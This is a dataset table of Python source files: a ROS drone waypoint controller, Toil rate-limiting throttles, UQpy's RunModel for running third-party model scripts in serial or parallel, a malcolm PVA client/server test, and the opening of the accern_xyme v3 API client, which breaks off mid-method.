source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
pattern.py | #! /usr/bin/env python
import rospy
from time import time, sleep
from datetime import datetime
from ar_track_alvar_msgs.msg import AlvarMarkers
from control import *
from callback import *
if __name__ == '__main__':
    # Drone mission controller driven by AR-tag localisation (ar_track_alvar).
    # NOTE(review): receive, send, sock1, get_drone_location, move_xy, threading,
    # drone_x/drone_y and goal_x/goal_y are not defined in this file -- presumably
    # provided by the star imports from control/callback above; verify.
    try:
        rospy.init_node('control_node', anonymous= False)
        rate = rospy.Rate(10)
        # Block until the AR marker tracker has published at least once.
        AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
        sleep(1)
        # Background listener for drone responses.
        receiveThread = threading.Thread(target=receive)
        receiveThread.daemon = True
        receiveThread.start()
        send("command", 3)
        send("takeoff", 8)
        sleep(1)
        count = 0            # consecutive localisation failures; 30 aborts the mission
        robot_in_pos = False
        i = 0                # index of the goal currently being pursued
        sleep(1)
        while not rospy.is_shutdown():
            if count == 30:
                # Too many failures: land and end the session.
                send("land", 5)
                print("Mission failed")
                sock1.close()
                rospy.signal_shutdown('End of testing')
            else:
                if not robot_in_pos:
                    AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
                    drone = get_drone_location(AlvarMsg)
                    # x == 0.0 acts as a "marker not seen" sentinel; all four
                    # markers must be visible before flying.
                    if drone[0]['x'] != 0.0 and drone[1]['x'] != 0.0 and drone[2]['x'] != 0 and drone[3]['x'] != 0:
                        #rotate drone to initial angle
                        print('\r\nDrone Position:')
                        print('Drone_M[0] = (x: %.2f, y: %.2f)' % (drone[0]['x'], drone[0]['y']))
                        print('Drone_M[1] = (x: %.2f, y: %.2f)' % (drone[1]['x'], drone[1]['y']))
                        print('Drone_M[2] = (x: %.2f, y: %.2f)' % (drone[2]['x'], drone[2]['y']))
                        print('Drone_M[3] = (x: %.2f, y: %.2f)' % (drone[3]['x'], drone[3]['y']))
                        print('')
                        sleep(1)
                        robot_in_pos = True
                    else:
                        robot_in_pos = False
                        count += 1
                else:
                    #update the drone's current position
                    AlvarMsg = rospy.wait_for_message('/ar_pose_marker', AlvarMarkers)
                    drone = get_drone_location(AlvarMsg)
                    # NOTE(review): drone_x/drone_y and goal_x/goal_y are read
                    # here before any local assignment (they are reset below) --
                    # confirm they are module-level state from the star imports.
                    print ("drone x: %3.3f , drone y: %3.3f" % (drone_x, drone_y))
                    status = move_xy(goal_x[i], goal_y[i], drone_x, drone_y)
                    sleep(1)
                    if status == 'Goal Position reached':
                        print("Mission completed successfully!")
                        robot_in_pos = False
                        i += 1
                        if i == 3: #No. of goals
                            robot_in_pos = False
                            send("land", 5)
                            print("Mission completed successfully!")
                            sock1.close()
                            rospy.signal_shutdown('End of testing')
                    else:
                        count += 1
                    drone_x, drone_y = (0.0, 0.0)
                    goal_x[i], goal_y[i] = (0.0, 0.0)
                    robot_in_pos = False
    except rospy.ROSInterruptException:
        # Ctrl-C / node shutdown: make sure the drone lands and the socket closes.
        send("land", 5)
        sock1.close()
        print('Simulation terminated')
        pass
throttle.py | # Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# 5.14.2018: copied into Toil from https://github.com/BD2KGenomics/bd2k-python-lib
from __future__ import absolute_import
from builtins import object
import time
import threading
from toil.lib.threading import BoundedEmptySemaphore
class GlobalThrottle(object):
    """
    A thread-safe rate limiter shared by every thread in the process. Use it
    to guard a global resource, either as a function/method decorator or
    directly via throttle(). Token generation starts lazily on the first call
    to throttle() (or to a decorated function); each call then consumes one
    token, waiting for it if necessary. The number of banked tokens is capped
    at construction time so a long pause cannot be followed by a burst that
    swamps the resource.
    """

    def __init__(self, min_interval, max_unused):
        self.min_interval = min_interval
        self.semaphore = BoundedEmptySemaphore(max_unused)
        self.thread_start_lock = threading.Lock()
        self.thread_started = False
        self.thread = threading.Thread(target=self.generator)
        self.thread.daemon = True

    def generator(self):
        # Daemon loop: mint one token per interval, silently discarding
        # tokens that would exceed the semaphore's bound.
        while True:
            try:
                self.semaphore.release()
            except ValueError:
                pass
            time.sleep(self.min_interval)

    def throttle(self, wait=True):
        """
        Acquire one rate token. With wait=True, block until a token is
        available and then return True, guaranteeing that no less than the
        configured minimum interval passed since the last True result in any
        thread. With wait=False, return True immediately when a token is
        available, otherwise False without blocking.
        """
        # Start the token generator exactly once; Thread.start() must not be
        # called twice, hence the lock around the check-and-start.
        with self.thread_start_lock:
            if not self.thread_started:
                self.thread.start()
                self.thread_started = True
        return self.semaphore.acquire(blocking=wait)

    def __call__(self, function):
        def wrapper(*args, **kwargs):
            self.throttle()
            return function(*args, **kwargs)

        return wrapper
class LocalThrottle(object):
    """
    A thread-safe rate limiter that throttles each thread independently. Can be used as a
    function or method decorator or as a simple object, via its .throttle() method.
    The use as a decorator is deprecated in favor of throttle().
    """

    def __init__(self, min_interval):
        """
        Initialize this local throttle.

        :param min_interval: The minimum interval in seconds between invocations of the
               throttle method or, if this throttle is used as a decorator, invocations of
               the decorated method.
        """
        self.min_interval = min_interval
        # Per-thread storage; each thread sees its own last_invocation.
        self.per_thread = threading.local()

    def throttle(self, wait=True):
        """
        If the wait parameter is True, this method returns True after suspending the
        current thread as necessary to ensure that no less than the configured minimum
        interval has passed since the last invocation of this method in the current
        thread returned True.

        If the wait parameter is False, this method immediately returns True (if at
        least the configured minimum interval has passed since the last time this
        method returned True in the current thread) or False otherwise.
        """
        now = time.time()
        # Bug fix: attributes assigned on a threading.local instance are only
        # visible to the thread that assigned them, so the original
        # initialization in __init__ left every OTHER thread to crash with
        # AttributeError on first use. getattr with a default makes the first
        # call in any thread behave as "never invoked before".
        last_invocation = getattr(self.per_thread, 'last_invocation', None)
        if last_invocation is not None:
            interval = now - last_invocation
            if interval < self.min_interval:
                if wait:
                    remainder = self.min_interval - interval
                    time.sleep(remainder)
                else:
                    return False
        self.per_thread.last_invocation = now
        return True

    def __call__(self, function):
        def wrapper(*args, **kwargs):
            self.throttle()
            return function(*args, **kwargs)

        return wrapper
class throttle(object):
    """
    A context manager (and decorator) that stretches the execution of its body
    to at least ``min_interval`` seconds, sleeping for the remainder if the
    body finished early. A body that already took longer is not delayed, and a
    body that raised an exception is never throttled.

    >>> start = time.time()
    >>> with throttle(1):
    ...     pass
    >>> 1 <= time.time() - start <= 1.1
    True

    >>> @throttle(1)
    ... def f():
    ...     pass
    >>> start = time.time()
    >>> f()
    >>> 1 <= time.time() - start <= 1.1
    True
    """

    def __init__(self, min_interval):
        self.min_interval = min_interval

    def __enter__(self):
        # Remember when the body began so __exit__ can pad out the remainder.
        self.start = time.time()

    def __exit__(self, exc_type, exc_val, exc_tb):
        # An exception disables throttling entirely.
        if exc_type is not None:
            return
        elapsed = time.time() - self.start
        pad = self.min_interval - elapsed
        if pad > 0:
            time.sleep(pad)

    def __call__(self, function):
        def wrapper(*args, **kwargs):
            with self:
                return function(*args, **kwargs)

        return wrapper
|
RunModel.py | import os
import numpy as np
import sys
class RunModel:
    """
    A class used to run a computational model a specified sample points.
    This class takes samples, either passed as a variable or read through a text file, and runs a specified
    computational model at those sample points. This can be done by either passing variables and running entirely in
    python or by calling shell scripts that run a third-party software model.
    Input:
    :param samples: The sample values at which the model will be evaluated. Samples can be passed directly as an array
                    or can be passed through the text file 'UQpy_Samples.txt'. If passing samples via text file, set
                    samples = None or do not set the samples input.
    :type samples: numpy array
    :param dimension: The dimension of the random variable whose samples are being passed to the model.
    :type dimension: int
    :param model_type: Define the model as a python file or as a third party software model (e.g. Matlab, Abaqus, etc.)
            Options: None - Run a third party software model
                     'python' - Run a python model. When selected, the python file must contain a class RunPythonModel
                                that takes, as input, samples and dimension and returns quantity of interest (qoi) in
                                in list form where there is one item in the list per sample. Each item in the qoi list
                                may take type the user prefers.
            Default: None
    :type model_type: str
    :param model_script: Defines the script (must be either a shell script (.sh) or a python script (.py)) used to call
                            the model.
                         This is a user-defined script that must be provided.
                         If model_type = 'python', this must be a python script (.py) having a specified class
                            structure. Details on this structure can be found in the UQpy documentation.
    :type: model_script: str
    :param input_script: Defines the script (must be either a shell script (.sh) or a python script (.py)) that takes
                            samples generated by UQpy from the sample file generated by UQpy (UQpy_run_{0}.txt) and
                            imports them into a usable input file for the third party solver. Details on
                            UQpy_run_{0}.txt can be found in the UQpy documentation.
                         If model_type = None, this is a user-defined script that the user must provide.
                         If model_type = 'python', this is not used.
    :type: input_script: str
    :param output_script: (Optional) Defines the script (must be either a shell script (.sh) or python script (.py))
                            that extracts quantities of interest from third-party output files and saves them to a file
                            (UQpy_eval_{}.txt) that can be read for postprocessing and adaptive sampling methods by
                            UQpy.
                          If model_type = None, this is an optional user-defined script. If not provided, all run files
                            and output files will be saved in the folder 'UQpyOut' placed in the current working
                            directory. If provided, the text files UQpy_eval_{}.txt are placed in this directory and all
                            other files are deleted.
                          If model_type = 'python', this is not used.
    :type output_script: str
    :param cpu: Number of CPUs over which to run the job.
                UQpy distributes the total number of model evaluations over this number of CPUs
                Default: 1 - Runs serially
    :type cpu: int
    Output:
    :param model_eval: An instance of a sub-class that contains the model solutions. Depending on how the model is run,
                        model_eval is an instance of a different class.
                       If model_type = 'python', model_eval is an instance of the class RunPythonModel defined in the
                            python model_script.
                       If model_type = 'None' and cpu <= 1, model_eval is an instance of the class RunSerial
                       If model_type = 'None' and cpu > 1, model_eval is an instance of the class RunParallel
                       Regardless of model_type, model_eval has the following key attributes:
                            model_eval.samples = Sample values at which the model has been run.
                            model_eval.QOI = Solution of the model at each sample value.
    :type: model_eval: The two key attributes of model_eval have the following type.
                       model_eval.samples = numpy array
                       model_eval.QOI = list
    """
    # Authors: Dimitris Giovanis, Michael D. Shields
    # Updated: 5/1/18 by Michael D. Shields & Dimitris Giovanis

    def __init__(self, samples=None, dimension=None, model_type=None, model_script=None, input_script=None,
                 output_script=None, cpu=None):
        self.CPUs = cpu
        self.model_type = model_type
        self.model_script = model_script
        self.input_script = input_script
        self.output_script = output_script
        self.dimension = dimension
        self.model_eval = []
        # If samples=None, then samples must be imported from UQpy_Samples.txt. Load the file and assign the samples to
        # 'self.samples'. Otherwise, read the samples as input.
        if samples is None and os.path.isfile('UQpy_Samples.txt'):
            self.samples = np.loadtxt('UQpy_Samples.txt', dtype=np.float32)
            if self.samples.ndim == 1:
                # A 1-D array is ambiguous: many 1-D samples, or one sample of
                # many dimensions. Disambiguate via self.dimension.
                if self.dimension == 1:
                    self.samples = self.samples.reshape(self.samples.shape[0], self.dimension)
                else:
                    self.samples = self.samples.reshape(1, self.samples.shape[0])
        elif samples is not None:
            self.samples = samples
        else:
            raise ValueError('Samples must be provided either as input to RunModel or from UQpy_Samples.txt')
        ################################################################################################################
        # Run a python model by importing the user-specified model_script file
        # model_script must contain a class RunPythonModel - See documentation for details.
        if self.model_type == 'python':
            # Check that the script is a python file
            if not self.model_script.lower().endswith('.py'):
                raise ValueError('A python script, with extension .py, must be provided.')
            model_script = self.model_script[:-3]
            python_model = __import__(model_script)
            print("\nEvaluating the model...\n")
            self.model_eval = python_model.RunPythonModel(self.samples,self.dimension)
        ################################################################################################################
        # Run a third-party software model with file-passing
        elif self.model_type is None:
            import shutil
            current_dir = os.getcwd()
            ############################################################################################################
            # Create a unique temporary directory 'tmp'.
            # Run the model from this directory.
            # Move the data generated by the model to the directory 'UQpyOut'
            # Remove 'tmp' after completion.
            folder_name = 'UQpyOut'
            output_directory = os.path.join(os.sep, current_dir, folder_name)
            # Create a list of all of the working files
            model_files = list()
            for fname in os.listdir(current_dir):
                path = os.path.join(current_dir, fname)
                if not os.path.isdir(path):
                    model_files.append(path)
            # Create tmp directory
            dir_path = os.path.join(current_dir, 'tmp')
            if os.path.exists(dir_path) and os.path.isdir(dir_path):
                shutil.rmtree(dir_path)
            os.makedirs('tmp', exist_ok=False)
            work_dir = os.path.join(os.sep, current_dir, 'tmp')
            # Copy files from the model list to tmp
            for file_name in model_files:
                full_file_name = os.path.join(current_dir, file_name)
                shutil.copy(full_file_name, work_dir)
            # Change current working directory to tmp
            os.chdir(os.path.join(current_dir, work_dir))
            # Check for parallel or serial processing
            if self.CPUs != 1 and self.CPUs is not None:
                parallel_processing = True
                import multiprocessing
                n_cpu = multiprocessing.cpu_count()
                # Clamp the requested CPU count to what the machine provides.
                if self.CPUs > n_cpu:
                    print("Error: You have available {0:1d} CPUs. Start parallel computing ..."
                          "using {0:1d} CPUs".format(n_cpu))
                    self.CPUs = n_cpu
            else:
                parallel_processing = False
            # Run the model
            print("\nEvaluating the model...\n")
            # NOTE(review): RunSerial/RunParallel are accessed through self,
            # which requires them to be nested classes of RunModel -- confirm
            # the original nesting when restoring this file's indentation.
            if parallel_processing is True:
                self.model_eval = self.RunParallel(samples=self.samples, cpu=self.CPUs, dimension=self.dimension,
                                                   model_script=self.model_script, input_script=self.input_script,
                                                   output_script=self.output_script)
            else:
                if self.output_script is not None:
                    self.model_eval = self.RunSerial(samples=self.samples, dimension=self.dimension,
                                                     model_script=self.model_script, input_script=self.input_script,
                                                     output_script=self.output_script)
                else:
                    # NOTE(review): the return value is discarded here, leaving
                    # self.model_eval as [] -- confirm this is intended.
                    self.RunSerial(self.samples)
            # Move the data to directory UQpyOut
            os.makedirs(output_directory, exist_ok=True)
            path = os.path.join(current_dir, work_dir)
            if self.output_script is not None:
                # Keep only the extracted result files (UQpy_eval_*).
                src_files = [filename for filename in os.listdir(path) if filename.startswith("UQpy_eval_")]
                for file_name in src_files:
                    full_file_name = os.path.join(path, file_name)
                    shutil.copy(full_file_name, output_directory)
            else:
                # No output script: keep every file the model produced.
                src_files = [filename for filename in os.listdir(path)]
                for file_name in src_files:
                    full_file_name = os.path.join(path, file_name)
                    shutil.copy(full_file_name, output_directory)
            # Delete the tmp working directory
            shutil.rmtree(work_dir)
            os.chdir(current_dir)
####################################################################################################################
class RunSerial:
    """
    A subclass of RunModel to run a third-party software model serially (without parallel processing).
    Most attributes of this subclass are inherited from RunModel. The only variable that is not inherited is QOI.
    Input:
    :param samples: Inherited from RunModel. See its documentation.
    :type samples: numpy array
    :param dimension: Inherited from RunModel. See its documentation.
    :type dimension: int
    :param model_script: Inherited from RunModel. See its documentation.
    :type: model_script: str
    :param input_script: Inherited from RunModel. See its documentation.
    :type: input_script: str
    :param output_script: Inherited from RunModel. See its documentation.
    :type output_script: str
    Output:
    :param QOI: List containing the Quantity of Interest from the simulations
                Each item in the list corresponds to one simulation
    :type QOI: list
                Each item in the list may be of arbitrary data type (e.g. int, float, nparray, etc.)
    """
    # Authors: Dimitris Giovanis, Michael D. Shields
    # Updated: 5/1/18 by Michael D. Shields & Dimitris Giovanis

    def __init__(self, samples=None, dimension=None, model_script=None, input_script=None, output_script=None):
        self.dimension = dimension
        self.model_script = model_script
        self.input_script = input_script
        self.output_script = output_script
        self.samples = samples
        self.QOI = []
        # One full input -> model -> output cycle per sample row.
        for i in range(self.samples.shape[0]):
            # Write each value of UQpy_Samples.txt (self.samples) into a separate *.txt file
            with open('UQpy_run_{0}.txt'.format(i), 'wb') as f:
                np.savetxt(f, self.samples[i, :], fmt='%0.5f')
            # Run input_script to create the input file for the model
            # input_script is a user defined script that converts UQpy_run_{0}.txt into a usable input file for
            # third party software.
            if self.input_script.lower().endswith('.sh'):
                join_input_script = './{0} {1}'.format(self.input_script, i)
                os.system(join_input_script)
            elif self.input_script.lower().endswith('.py'):
                join_input_script = 'python {0} {1}'.format(self.input_script, i)
                os.system(join_input_script)
            else:
                print('Unrecognized script type. Options are shell script (.sh) or python script (.py).')
                sys.exit()
            # Run model_script to run the model
            # model_script is a user defined script that calls the third-party model.
            if self.model_script.lower().endswith('.sh'):
                join_model_script = './{0} {1}'.format(self.model_script, i)
                os.system(join_model_script)
            elif self.model_script.lower().endswith('.py'):
                join_model_script = 'python {0} {1}'.format(self.model_script, i)
                os.system(join_model_script)
            else:
                print('Unrecognized script type. Options are shell script (.sh) or python script (.py).')
                sys.exit()
            if self.output_script is not None:
                # Run output_script to extract output of interest from model output files.
                if self.output_script.lower().endswith('.sh'):
                    join_output_script = './{0} {1}'.format(self.output_script, i)
                    os.system(join_output_script)
                elif self.output_script.lower().endswith('.py'):
                    join_output_script = 'python {0} {1}'.format(self.output_script, i)
                    os.system(join_output_script)
                else:
                    print('Unrecognized script type. Options are shell script (.sh) or python script (.py).')
                    sys.exit()
                # Save the results from each simulation to a separate text file
                # NOTE(review): indentation was lost in this copy; the append is
                # placed inside the output_script branch because UQpy_eval_{}.txt
                # only exists when the output script ran -- confirm.
                self.QOI.append(np.loadtxt('UQpy_eval_{}.txt'.format(i)))
####################################################################################################################
class RunParallel:
    """
    A subclass of RunModel to run a third-party software model with parallel processing.
    Most attributes of this subclass are inhereted from RunModel. The only variable that is not inherited is QOI.
    Input:
    :param samples: Inherited from RunModel. See its documentation.
    :type samples: numpy array
    :param dimension: Inherited from RunModel. See its documentation.
    :type dimension: int
    :param model_script: Inherited from RunModel. See its documentation.
    :type: model_script: str
    :param input_script: Inherited from RunModel. See its documentation.
    :type: input_script: str
    :param output_script: Inherited from RunModel. See its documentation.
    :type output_script: str
    Output:
    :param QOI: List containing the Quantity of Interest from the simulations
                Each item in the list corresponds to one simulation
    :type QOI: list
                Each item in the list may be of arbitrary data type (e.g. int, float, nparray, etc.)
    """
    # Authors: Dimitris Giovanis, Michael D. Shields
    # Updated: 5/1/18 by Michael D. Shields & Dimitris Giovanis

    def __init__(self, samples=None, cpu=None, model_script=None, input_script=None, output_script=None,
                 dimension=None):
        self.samples = samples
        self.dimension = dimension
        self.CPUs = cpu
        self.model_script = model_script
        self.input_script = input_script
        self.output_script = output_script
        from multiprocessing import Process
        from multiprocessing import Queue
        # If there are fewer samples than CPUs, shrink the worker count so no
        # worker is left without a batch.
        jobs_per_cpu = int(np.floor(self.samples.shape[0]/self.CPUs))
        jobs_remaining = np.mod(self.samples.shape[0],self.CPUs)
        if jobs_per_cpu == 0:
            self.CPUs = jobs_remaining
            print('The number of CPUs used is {}\n '.format(self.CPUs))
        # Break the simulation set into sets to be run over each CPU
        [batches, batch_ind] = self.chunk_samples_cpus()
        # Initialize the parallel processing queue and processes
        que = Queue()
        jobs = [Process(target=self.run_parallel_model, args=(batch_ind[a], que)) for a in
                range(self.CPUs)]
        # Start the parallel processes.
        for j in jobs:
            j.start()
        for j in jobs:
            j.join()
        # Collect the results from the processes and sort them into the original sample order.
        self.QOI = [None]*self.samples.shape[0]
        # NOTE(review): Queue.get ignores its positional argument's identity --
        # 'que.get(j)' simply pops one [indices, results] pair per worker.
        results = [que.get(j) for j in jobs]
        for i in range(self.CPUs):
            k = 0
            for j in results[i][0]:
                self.QOI[j] = results[i][1][k]
                k = k+1

    ################################################################################################################
    # Function to call the model
    def run_parallel_model(self, job_inds, que):
        # Normalize self.samples to a 2-D (n_samples, dimension) array before
        # indexing rows below.
        if self.samples.size == 1:
            self.samples = self.samples.reshape(1, 1)
        if len(self.samples.shape) == 1 and self.dimension != 1:
            self.samples = self.samples.reshape(1, self.samples.shape[0])
        elif len(self.samples.shape) == 1 and self.dimension == 1:
            self.samples = self.samples.reshape(self.samples.shape[0], 1)
        model_eval = list()
        for i in job_inds:
            # Write each value of UQpyOut.txt into a *.txt file
            np.savetxt('UQpy_run_{0}.txt'.format(int(i)), self.samples[i, :], newline=' ', delimiter=',',
                       fmt='%0.5f')
            # Run the input script to convert UQpy_run_X.txt to a valid model input
            # NOTE(review): unlike RunSerial, only .sh scripts are accepted here.
            if self.input_script.lower().endswith('.sh'):
                join_input_script = './{0} {1}'.format(self.input_script, int(i))
                os.system(join_input_script)
            else:
                print('Unrecognized type of input file script. Must be .sh')
                sys.exit()
            # Run the third-party model script (model_script)
            if self.model_script.lower().endswith('.sh'):
                join_model_script = './{0} {1}'.format(self.model_script, int(i))
                os.system(join_model_script)
            else:
                print('Unrecognized type of model file')
                sys.exit()
            # Run the output script to convert model results to UQpy_eval_X.txt to be read by UQpy
            if self.output_script.lower().endswith('.sh'):
                join_output_script = './{0} {1}'.format(self.output_script, int(i))
                os.system(join_output_script)
            else:
                print('Unrecognized type of Input file')
                sys.exit()
            model_eval.append(np.loadtxt('UQpy_eval_{0}.txt'.format(int(i))))
            # Rename the per-run result file so later runs cannot clobber it.
            src_files = 'UQpy_eval_{0}.txt'.format(int(i))
            file_new = src_files.replace("UQpy_eval_{0}.txt".format(int(i)), "Model_{0}.txt".format(int(i)))
            os.rename(src_files, file_new)
        # Hand [indices, results] back to the parent via the queue.
        # NOTE(review): Queue.put returns None, so model_eval is None here.
        model_eval = que.put([job_inds, model_eval])
        return model_eval

    ################################################################################################################
    # Chunk the samples into batches
    def chunk_samples_cpus(self):
        # Start every batch at ceil(n/CPUs), then shave one off the first
        # 'dif' batches so the total matches the sample count exactly.
        size_ = np.array([np.ceil(self.samples.shape[0]/self.CPUs) for i in range(self.CPUs)]).astype(int)
        dif = np.sum(size_) - self.samples.shape[0]
        for k in range(dif):
            size_[k] = size_[k] - 1
        batches = [None]*self.CPUs
        batch_ind = [None]*self.CPUs
        for i in range(self.CPUs):
            if i == 0:
                batch_ind[i] = range(size_[i])
            else:
                batch_ind[i] = range(int(np.sum(size_[:i])), int(np.sum(size_[:i+1])))
            batches[i] = self.samples[batch_ind[i], :]
        return batches, batch_ind
# This code may be used in the future to extend for distributed computing for HPC use.
# def chunk_samples_nodes(samples, args):
#
# # In case of cluster divide the samples into chunks in order to sent to each processor
# chunks = args.nodes
# size = np.array([np.ceil(samples.shape[0]/chunks) in range(args.nodes)]).astype(int)
# dif = np.sum(size) - samples.shape[0]
# count = 0
# for k in range(dif):
# size[count] = size[count] - 1
# count = count + 1
# for i in range(args.nodes):
# if i == 0:
# lines = range(0, size[i])
# else:
# lines = range(int(np.sum(size[:i])), int(np.sum(size[:i+1])))
#
# np.savetxt('UQpy_Batch_{0}.txt'.format(i+1), samples[lines, :], fmt='%0.5f')
# np.savetxt('UQpy_Batch_index_{0}.txt'.format(i+1), lines) |
test_system_pva.py | import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "..", ".."))
import multiprocessing
import unittest
# module imports
def p1(q):
    """Server-side entry point, run in a separate OS process.

    Hosts hello/counter/PVA-server blocks in a malcolm Process and spins
    until anything arrives on *q*, which signals shutdown.

    :param q: multiprocessing.Queue used purely as a stop signal.
    """
    import logging
    logging.basicConfig(level=logging.DEBUG)
    # Bug fix: Process was used below but never imported in this function.
    # The __main__-guard import does not run when this function executes in a
    # child process spawned by the test suite, so it raised NameError.
    from malcolm.core import call_with_params, Context, Process
    from malcolm.blocks.demo import hello_block, counter_block
    from malcolm.blocks.pva import pva_server_block
    process = Process("proc")
    call_with_params(hello_block, process, mri="hello")
    call_with_params(counter_block, process, mri="counter2")
    call_with_params(pva_server_block, process, mri="server")
    context = Context(process)
    process.start()
    while True:
        try:
            # Any item on the queue means "stop"; the timeout keeps us polling.
            q.get(timeout=0.01)
        except Exception:
            context.sleep(0.1)
        else:
            process.stop(timeout=1)
            return
class TestSystemPVACommsServerAndClient(unittest.TestCase):
    # System test: a PVA server (run in a separate OS process via p1) is
    # exercised by a PVA client block hosted in this process.

    def setUp(self):
        # Server side runs in its own process; mp_q is only used to tell it
        # to shut down in tearDown.
        self.mp_q = multiprocessing.Queue()
        self.mp = multiprocessing.Process(target=p1, args=(self.mp_q,))
        self.mp.start()
        from malcolm.core import Process, call_with_params
        from malcolm.blocks.pva import pva_client_block
        self.process2 = Process("proc2")
        self.client = call_with_params(
            pva_client_block, self.process2, mri="client")
        self.process2.start()

    def tearDown(self):
        self.process2.stop(timeout=1)
        # Any item on the queue makes the server process stop and exit.
        self.mp_q.put(None)
        self.mp.join()

    # NOTE(review): the missing "test_" prefix means unittest will not collect
    # this method -- presumably disabled deliberately; confirm before renaming.
    def s_server_hello_with_malcolm_client(self):
        from malcolm.core import call_with_params, Context, ResponseError
        from malcolm.blocks.builtin import proxy_block
        call_with_params(
            proxy_block, self.process2, mri="hello", comms="client")
        context = Context(self.process2)
        context.when_matches(["hello", "health", "value"], "OK", timeout=2)
        block2 = self.process2.block_view("hello")
        ret = block2.greet(name="me2")
        assert ret == dict(greeting="Hello me2")
        with self.assertRaises(ResponseError):
            block2.error()

    #def test_server_counter_with_malcolm_client(self):
    #    from malcolm.core import call_with_params, Context
    #    from malcolm.blocks.builtin import proxy_block
    #    call_with_params(
    #        proxy_block, self.process2, mri="counter2", comms="client")
    #    context = Context("context", self.process2)
    #    context.when_matches(["counter2", "health", "value"], "OK", timeout=2)
    #    context.sleep(3)
    #    block2 = self.process2.block_view("counter2")
    #    block2.zero()
    #    self.assertEqual(block2.counter.value, 0)
    #    block2.increment()
    #    self.assertEqual(block2.counter.value, 1)
    #    block2.zero()
    #    self.assertEqual(block2.counter.value, 0)
    #    assert self.client.remote_blocks.value == (
    #        "hello", "counter", "server")
if __name__ == "__main__":
    # Manual entry point: run the server side in the foreground for debugging.
    # NOTE(review): Process is imported here at module scope, but under a test
    # runner p1 executes in a child process where this import never ran.
    from malcolm.core import Queue, Process
    q = Queue()
    p1(q)
|
accern_xyme.py | from typing import (
Any,
Callable,
cast,
Dict,
IO,
Iterable,
Iterator,
List,
Optional,
overload,
Set,
TextIO,
Tuple,
TYPE_CHECKING,
Union,
)
import io
import os
import sys
import json
import time
import weakref
import inspect
import textwrap
import threading
import contextlib
import collections
from io import BytesIO, StringIO
import pandas as pd
import requests
from requests import Response
from requests.exceptions import HTTPError, RequestException
from typing_extensions import Literal
import quick_server
from accern_xyme.v3.util import (
async_compute,
ByteResponse,
df_to_csv,
get_age,
get_file_hash,
get_file_upload_chunk_size,
get_max_retry,
get_progress_bar,
get_retry_sleep,
interpret_ctype,
merge_ctype,
safe_opt_num,
ServerSideError,
)
from accern_xyme.v3.types import (
BlobInit,
BlobOwner,
CacheStats,
CopyBlob,
CSVBlobResponse,
CSVList,
CSVOp,
CustomCodeResponse,
CustomImportsResponse,
DynamicResults,
DynamicStatusResponse,
ESQueryResponse,
FlushAllQueuesResponse,
InCursors,
InstanceStatus,
JobInfo,
JobList,
JSONBlobResponse,
KafkaGroup,
KafkaMessage,
KafkaOffsets,
KafkaThroughput,
KafkaTopics,
ListNamedSecretKeys,
MaintenanceResponse,
MinimalQueueStatsResponse,
ModelParamsResponse,
ModelReleaseResponse,
ModelSetupResponse,
NodeChunk,
NodeDef,
NodeDefInfo,
NodeInfo,
NodeState,
NodeStatus,
NodeTiming,
NodeTypes,
PipelineCreate,
PipelineDef,
PipelineDupResponse,
PipelineInfo,
PipelineInit,
PipelineList,
PipelineReload,
PutNodeBlob,
QueueMode,
QueueStatsResponse,
QueueStatus,
ReadNode,
SetNamedSecret,
TaskStatus,
Timing,
TimingResult,
Timings,
UserColumnsResponse,
VersionResponse,
VisibleBlobs,
WorkerScale,
)
if TYPE_CHECKING:
WVD = weakref.WeakValueDictionary[str, 'PipelineHandle']
else:
WVD = weakref.WeakValueDictionary
API_VERSION = 3
METHOD_DELETE = "DELETE"
METHOD_FILE = "FILE"
METHOD_GET = "GET"
METHOD_LONGPOST = "LONGPOST"
METHOD_POST = "POST"
METHOD_PUT = "PUT"
PREFIX = "/xyme"
INPUT_CSV_EXT = ".csv"
INPUT_TSV_EXT = ".tsv"
INPUT_ZIP_EXT = ".zip"
INPUT_EXT = [INPUT_ZIP_EXT, INPUT_CSV_EXT, INPUT_TSV_EXT]
FUNC = Callable[[Any], Any]
CUSTOM_NODE_TYPES = {
"custom_data",
"custom_json",
"custom_json_to_data",
"custom_json_join_data",
}
EMBEDDING_MODEL_NODE_TYPES = {
"dyn_embedding_model",
"static_embedding_model",
}
MODEL_NODE_TYPES = EMBEDDING_MODEL_NODE_TYPES
class AccessDenied(Exception):
    """Error for denied access.

    NOTE(review): no raise sites are visible in this chunk; semantics are
    inferred from the name only -- confirm against the rest of the module.
    """
    pass

# *** AccessDenied ***
class LegacyVersion(Exception):
    """Raised when the server does not report a usable integer API version
    (see XYMEClientV3.__init__)."""
    pass

# *** LegacyVersion ***
class XYMEClientV3:
def __init__(
        self,
        url: str,
        token: Optional[str]) -> None:
    """Create a client bound to *url*; when *token* is None the
    XYME_SERVER_TOKEN environment variable is used instead."""
    self._url = url.rstrip("/")
    self._token = (
        os.environ.get("XYME_SERVER_TOKEN") if token is None else token)
    self._last_action = time.monotonic()
    self._auto_refresh = True
    self._pipeline_cache: WVD = weakref.WeakValueDictionary()
    self._permissions: Optional[List[str]] = None
    self._node_defs: Optional[Dict[str, NodeDefInfo]] = None

    def server_api_version() -> int:
        # A server that cannot report an integer api_version is too old.
        info = self.get_server_version()
        try:
            return int(info["api_version"])
        except (ValueError, KeyError) as e:
            raise LegacyVersion() from e

    # Never negotiate above what this client library implements.
    self._api_version = min(server_api_version(), API_VERSION)
def get_api_version(self) -> int:
return self._api_version
def get_permissions(self) -> List[str]:
if self._permissions is None:
raise NotImplementedError("permissions are not implemented")
assert self._permissions is not None
return self._permissions
def set_auto_refresh(self, is_auto_refresh: bool) -> None:
self._auto_refresh = is_auto_refresh
def is_auto_refresh(self) -> bool:
return self._auto_refresh
def refresh(self) -> None:
self._node_defs = None
def _maybe_refresh(self) -> None:
if self.is_auto_refresh():
self.refresh()
@contextlib.contextmanager
def bulk_operation(self) -> Iterator[bool]:
old_refresh = self.is_auto_refresh()
try:
self.set_auto_refresh(False)
yield old_refresh
finally:
